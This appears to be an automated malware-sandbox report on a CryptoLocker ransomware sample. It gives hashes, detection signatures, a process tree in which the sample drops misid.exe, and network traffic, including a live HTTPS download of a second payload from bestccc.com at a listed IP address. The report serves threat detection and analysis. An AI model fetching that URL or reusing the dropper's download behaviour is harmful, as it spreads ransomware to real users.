Analysis

  • max time kernel
    117s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    01/02/2024, 09:03 UTC

General

  • Target

    2024-02-01_1090360d26072732ac893b6045f3a6e9_cryptolocker.exe

  • Size

    126KB

  • MD5

    1090360d26072732ac893b6045f3a6e9

  • SHA1

    464022f6d1bbac8637a97efe5e76f4da9177afd5

  • SHA256

    2a57393ee6c8be2e6f077f9fcadd9386024fa6371b42e715f459a76dbdc1f49d

  • SHA512

    ec5ec095473772f4bb5f013c94eb31777fd908a73c7683d91a769356287d9a9c37b9902e3745d17cfe701c027594153c86e7fa4067ccf1c66d796c5e15281a9d

  • SSDEEP

    1536:vj+jsMQMOtEvwDpj5HwYYTjipvF2hBfIuBKLUYOVbvh//K:vCjsIOtEvwDpj5H9YvQd2RQ

Score
9/10

Malware Config

Signatures

  • Detection of CryptoLocker Variants 1 IoCs
  • Detection of Cryptolocker Samples 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-02-01_1090360d26072732ac893b6045f3a6e9_cryptolocker.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-02-01_1090360d26072732ac893b6045f3a6e9_cryptolocker.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2900
    • C:\Users\Admin\AppData\Local\Temp\misid.exe
      "C:\Users\Admin\AppData\Local\Temp\misid.exe"
      2⤵
      • Executes dropped EXE
      • Modifies system certificate store
      PID:2200

Network

  • flag-us
    DNS
    bestccc.com
    misid.exe
    Remote address:
    8.8.8.8:53
    Request
    bestccc.com
    IN A
    Response
    bestccc.com
    IN A
    103.14.121.240
  • flag-in
    GET
    https://bestccc.com/hr/ho2.exe
    misid.exe
    Remote address:
    103.14.121.240:443
    Request
    GET /hr/ho2.exe HTTP/1.1
    Accept: text/*, application/*
    User-Agent: Updates downloader
    Host: bestccc.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Thu, 01 Feb 2024 09:03:13 GMT
    Content-Type: application/octet-stream
    Transfer-Encoding: chunked
    Connection: close
    Server: imunify360-webshield/1.21
    Last-Modified: Thursday, 01-Feb-2024 09:03:13 GMT
    Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0
    cf-edge-cache: no-cache
  • flag-us
    DNS
    www.microsoft.com
    misid.exe
    Remote address:
    8.8.8.8:53
    Request
    www.microsoft.com
    IN A
    Response
    www.microsoft.com
    IN CNAME
    www.microsoft.com-c-3.edgekey.net
    www.microsoft.com-c-3.edgekey.net
    IN CNAME
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    IN CNAME
    e13678.dscb.akamaiedge.net
    e13678.dscb.akamaiedge.net
    IN A
    2.17.5.133
  • flag-us
    DNS
    crl.comodoca.com
    misid.exe
    Remote address:
    8.8.8.8:53
    Request
    crl.comodoca.com
    IN A
    Response
    crl.comodoca.com
    IN CNAME
    crl.comodoca.com.cdn.cloudflare.net
    crl.comodoca.com.cdn.cloudflare.net
    IN A
    172.64.149.23
    crl.comodoca.com.cdn.cloudflare.net
    IN A
    104.18.38.233
  • flag-us
    GET
    http://crl.comodoca.com/cPanelIncCertificationAuthority.crl
    misid.exe
    Remote address:
    172.64.149.23:80
    Request
    GET /cPanelIncCertificationAuthority.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: crl.comodoca.com
    Response
    HTTP/1.1 200 OK
    Date: Thu, 01 Feb 2024 09:03:35 GMT
    Content-Type: application/pkix-crl
    Content-Length: 59932
    Connection: keep-alive
    Last-Modified: Wed, 31 Jan 2024 16:54:53 GMT
    ETag: "65ba7b5d-ea1c"
    X-CCACDN-Mirror-ID: mscrl2
    Cache-Control: max-age=14400, s-maxage=3600
    Expires: Wed, 07 Feb 2024 16:54:53 GMT
    X-CCACDN-Proxy-ID: mcdpinlb3
    X-Frame-Options: SAMEORIGIN
    CF-Cache-Status: HIT
    Age: 3127
    Accept-Ranges: bytes
    Server: cloudflare
    CF-RAY: 84e905a56cf86389-LHR
  • 103.14.121.240:443
    https://bestccc.com/hr/ho2.exe
    tls, http
    misid.exe
    1.2kB
    3.7kB
    10
    9

    HTTP Request

    GET https://bestccc.com/hr/ho2.exe

    HTTP Response

    200
  • 172.64.149.23:80
    http://crl.comodoca.com/cPanelIncCertificationAuthority.crl
    http
    misid.exe
    1.4kB
    62.3kB
    27
    47

    HTTP Request

    GET http://crl.comodoca.com/cPanelIncCertificationAuthority.crl

    HTTP Response

    200
  • 8.8.8.8:53
    bestccc.com
    dns
    misid.exe
    57 B
    73 B
    1
    1

    DNS Request

    bestccc.com

    DNS Response

    103.14.121.240

  • 8.8.8.8:53
    www.microsoft.com
    dns
    misid.exe
    63 B
    230 B
    1
    1

    DNS Request

    www.microsoft.com

    DNS Response

    2.17.5.133

  • 8.8.8.8:53
    crl.comodoca.com
    dns
    misid.exe
    62 B
    143 B
    1
    1

    DNS Request

    crl.comodoca.com

    DNS Response

    172.64.149.23
    104.18.38.233

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Users\Admin\AppData\Local\Temp\TarD4F.tmp

    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

  • C:\Users\Admin\AppData\Local\Temp\misid.exe

    Filesize

    126KB

    MD5

    d45041de7efd3aa0d0e572f2f1dd29b2

    SHA1

    c5c093c28eeaacf59315e369abe04ba5578daea0

    SHA256

    24a8576b5ed2e3140777fd7a12e6d0bee5bbb59bdbe11665dd390f4ff7aa287a

    SHA512

    f376c49d00625abc7f419c6684aa1d1608b43af4b2d4b33edefea08a1d9502c34f801ee79dc88405131bb9c7d6f93fdd0ccfbbd54221dca50ca4efcd095876c8

  • memory/2200-15-0x0000000000480000-0x0000000000486000-memory.dmp

    Filesize

    24KB

  • memory/2200-22-0x0000000000440000-0x0000000000446000-memory.dmp

    Filesize

    24KB

  • memory/2900-1-0x00000000004A0000-0x00000000004A6000-memory.dmp

    Filesize

    24KB

  • memory/2900-0-0x0000000000300000-0x0000000000306000-memory.dmp

    Filesize

    24KB

  • memory/2900-8-0x0000000000300000-0x0000000000306000-memory.dmp

    Filesize

    24KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.